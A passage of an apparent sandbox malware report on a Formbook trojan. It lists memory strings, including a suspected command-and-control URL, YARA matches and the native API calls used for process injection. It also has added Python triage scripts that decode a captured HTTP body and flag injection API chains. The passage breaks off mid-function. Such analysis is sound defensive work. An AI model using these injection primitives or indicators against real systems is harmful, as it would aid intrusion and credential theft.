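The three Cloudflare-fronted 404 responses at 10:49:03, 10:49:06 and 10:49:09 carry chunked, gzip-compressed bodies, so their "Data Ascii" rendering is just the printable bytes of a deflate stream and tells an analyst nothing; to see what the decoy host actually returned, the "Data Raw" bytes have to be unchunked and gunzipped. The following Python is an added example, not part of the Joe Sandbox report. The hex is copied from the 10:49:03 response above; everything else (function names, the decision to report an inflation failure as `None` rather than raising) is the editor's. The gzip trailer of that chunk declares ISIZE 0x224 = 548 bytes, the same length as the plain nginx 404 page the 10:49:11 response returns with chunk size `224`.

```python
"""Unchunk and gunzip an HTTP body captured as a sandbox "Data Raw" hex dump."""
import binascii
import gzip
import struct
import zlib
from typing import Optional, Tuple

# Hex copied from the "Data Raw" field of the 10:49:03 response in this report:
# one chunk of 0xa7 bytes holding a complete gzip member, then the 0-length chunk.
DATA_RAW_HEX = " ".join([
    "61 37 0d 0a",
    "1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85",
    "de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d",
    "94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5",
    "15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c",
    "b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6",
    "1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46",
    "4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e",
    "18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27",
    "a7 bf a8 24 02 00 00",
    "0d 0a 30 0d 0a 0d 0a",
])


def parse_chunked(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body; stops at the zero-length chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)                              # trailers, if any, are ignored
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def gzip_trailer(member: bytes) -> Tuple[int, int]:
    """Return (CRC32, ISIZE) declared in the last eight bytes of a gzip member."""
    if member[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip member")
    return struct.unpack("<II", member[-8:])


def decode_body(hex_dump: str) -> dict:
    """Unchunk, read the gzip trailer, then try to inflate.

    A corrupt deflate stream or a CRC/ISIZE mismatch is reported as plain=None
    instead of raising, so the framing facts are still returned for triage.
    """
    raw = binascii.unhexlify(hex_dump.replace(" ", ""))
    member = parse_chunked(raw)
    crc, isize = gzip_trailer(member)
    plain: Optional[bytes]
    try:
        plain = gzip.decompress(member)
    except (OSError, EOFError, zlib.error):
        plain = None
    return {"chunk_len": len(member), "crc32": crc, "isize": isize, "plain": plain}


if __name__ == "__main__":
    result = decode_body(DATA_RAW_HEX)
    print(f"chunk {result['chunk_len']} bytes, declared plain size {result['isize']}, "
          f"crc32 {result['crc32']:08x}")
    if result["plain"] is not None:
        print(result["plain"].decode("latin-1"))
```

Running the script on the embedded dump reports a 167-byte chunk whose trailer declares 548 plain bytes and CRC32 a8bfa727. The same function works on a multi-chunk body; the report's dumps are truncated past a fixed length, and a dump cut inside a chunk fails in `parse_chunked` with a missing-CRLF error, which is the signal to fetch the full PCAP rather than trust the rendered bytes.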
            Source: FrywuFHvnDbLo.exe, 00000005.00000002.3548998319.00000000052C5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency
            Source: FrywuFHvnDbLo.exe, 00000005.00000002.3548998319.00000000052C5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency/zznj/
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mstsc.exe, 00000003.00000002.3548096253.000000000556C000.00000004.10000000.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mstsc.exe, 00000003.00000002.3546768186.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mstsc.exe, 00000003.00000003.1991950984.0000000007622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mstsc.exe, 00000003.00000002.3548096253.0000000005D46000.00000004.10000000.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.0000000004036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FPR_xXrA%3Dn
            Source: mstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007E407C
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007E427A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007D003A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007FCB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007FCB26

            E-Banking Fraud

            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: This is a third-party compiled AutoIt script.0_2_00773B4C
            Source: rP0n___87004354.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: rP0n___87004354.exe, 00000000.00000000.1687919642.0000000000824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c55106b3-0
            Source: rP0n___87004354.exe, 00000000.00000000.1687919642.0000000000824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_6be9a8d1-6
            Source: rP0n___87004354.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e9c1548a-6
            Source: rP0n___87004354.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_9388454b-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024BC553 NtClose,1_2_024BC553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,1_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04584650 NtSuspendThread,LdrInitializeThunk,3_2_04584650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04584340 NtSetContextThread,LdrInitializeThunk,3_2_04584340
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04582C70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582C60 NtCreateKey,LdrInitializeThunk,3_2_04582C60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04582CA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04582D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04582D30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582DD0 NtDelayExecution,LdrInitializeThunk,3_2_04582DD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04582DF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04582EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04582E80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582F30 NtCreateSection,LdrInitializeThunk,3_2_04582F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FE0 NtCreateFile,LdrInitializeThunk,3_2_04582FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FB0 NtResumeThread,LdrInitializeThunk,3_2_04582FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582AD0 NtReadFile,LdrInitializeThunk,3_2_04582AD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582AF0 NtWriteFile,LdrInitializeThunk,3_2_04582AF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582B60 NtClose,LdrInitializeThunk,3_2_04582B60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04582BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04582BE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04582BA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045835C0 NtCreateMutant,LdrInitializeThunk,3_2_045835C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045839B0 NtGetContextThread,LdrInitializeThunk,3_2_045839B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582C00 NtQueryInformationProcess,3_2_04582C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582CC0 NtQueryVirtualMemory,3_2_04582CC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582CF0 NtOpenProcess,3_2_04582CF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582D00 NtSetInformationFile,3_2_04582D00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582DB0 NtEnumerateKey,3_2_04582DB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582E30 NtWriteVirtualMemory,3_2_04582E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582EA0 NtAdjustPrivilegesToken,3_2_04582EA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582F60 NtCreateProcessEx,3_2_04582F60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582F90 NtProtectVirtualMemory,3_2_04582F90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FA0 NtQuerySection,3_2_04582FA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582AB0 NtWaitForSingleObject,3_2_04582AB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582B80 NtQueryInformationFile,3_2_04582B80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583010 NtOpenDirectoryObject,3_2_04583010
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583090 NtSetValueKey,3_2_04583090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583D70 NtOpenThread,3_2_04583D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583D10 NtOpenProcessToken,3_2_04583D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00188EE0 NtCreateFile,3_2_00188EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00189040 NtReadFile,3_2_00189040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00189130 NtDeleteFile,3_2_00189130
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_001891D0 NtClose,3_2_001891D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00189330 NtAllocateVirtualMemory,3_2_00189330
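The Code function lines above enumerate, for svchost.exe (process index 1) and mstsc.exe (process index 3), the Nt* native calls the injected code resolves, many of them tagged with LdrInitializeThunk. Read one at a time they are noise; grouped per process they spell out the injection primitives the report flags elsewhere: NtOpenProcess with NtWriteVirtualMemory and NtQueueApcThread, NtSetContextThread with NtResumeThread, and NtCreateSection with NtMapViewOfSection. The following Python is an added triage example, not part of the Joe Sandbox report. It parses lines in the flattened form shown on this page, groups the named APIs per process index, and flags those three chains. The chain definitions are the editor's own heuristics, the sample lines are copied from this report, and the "process index" is the sandbox's `0_`, `1_`, `3_` prefix rather than a Windows PID.

```python
"""Triage Joe Sandbox "Code function" evidence: group the native Nt* calls each
process resolves and flag the process-injection primitive chains among them."""
import re
from collections import defaultdict
from typing import Dict, List, Set

# One flattened report line looks like:
#   Source: <image path>Code function: <idx>_<run>_<addr> <api>,<api>,...,<idx>_<run>_<addr>
# <idx> is the sandbox process index (the 0000000N prefix of the memory dumps), not a Windows PID.
LINE_RE = re.compile(
    r"Source:\s*(?P<path>.+?)Code function:\s*"
    r"(?P<idx>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+)"
    r"(?:\s+(?P<apis>.*?),?)?"          # API list is absent for plain function stubs
    r"(?P=idx)_\d+_(?P=addr)\s*$"
)

# Editor's heuristics: each chain is reported only when every listed primitive is present.
CHAIN_APC = "remote write + APC queue (NtOpenProcess, NtWriteVirtualMemory, NtQueueApcThread)"
CHAIN_CONTEXT = "thread context hijack (NtSetContextThread, NtResumeThread)"
CHAIN_SECTION = "section mapping (NtCreateSection, NtMapViewOfSection)"
INJECTION_CHAINS = [
    (CHAIN_APC, {"NtOpenProcess", "NtWriteVirtualMemory", "NtQueueApcThread"}),
    (CHAIN_CONTEXT, {"NtSetContextThread", "NtResumeThread"}),
    (CHAIN_SECTION, {"NtCreateSection", "NtMapViewOfSection"}),
]

# Constructed sample: lines copied from the evidence in this report, including one
# stub line without an API list and one non-native (clipboard) line.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04584340 NtSetContextThread,LdrInitializeThunk,3_2_04584340
Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FB0 NtResumeThread,LdrInitializeThunk,3_2_04582FB0
Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00188EE0 NtCreateFile,3_2_00188EE0
Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077E8000_2_0077E800
Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007E427A
"""


def parse_lines(text: str) -> Dict[str, Set[str]]:
    """Map "<idx>:<image name>" to the set of every API named on its Code function lines."""
    procs: Dict[str, Set[str]] = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # not a Code function line, or malformed
        image = m.group("path").rsplit("\\", 1)[-1]
        key = f"{m.group('idx')}:{image}"
        apis = m.group("apis") or ""      # stub lines carry no API list
        procs[key].update(a for a in apis.split(",") if a)
    return procs


def flag_injection(apis: Set[str]) -> List[str]:
    """Return the names of the injection chains whose primitives are all present."""
    return [name for name, needed in INJECTION_CHAINS if needed <= apis]


def triage(text: str) -> Dict[str, dict]:
    """Per process: sorted Nt* calls, matched chains, and whether LdrInitializeThunk is tagged."""
    report = {}
    for key, apis in parse_lines(text).items():
        nt_apis = sorted(a for a in apis if a.startswith("Nt"))
        report[key] = {
            "nt_apis": nt_apis,
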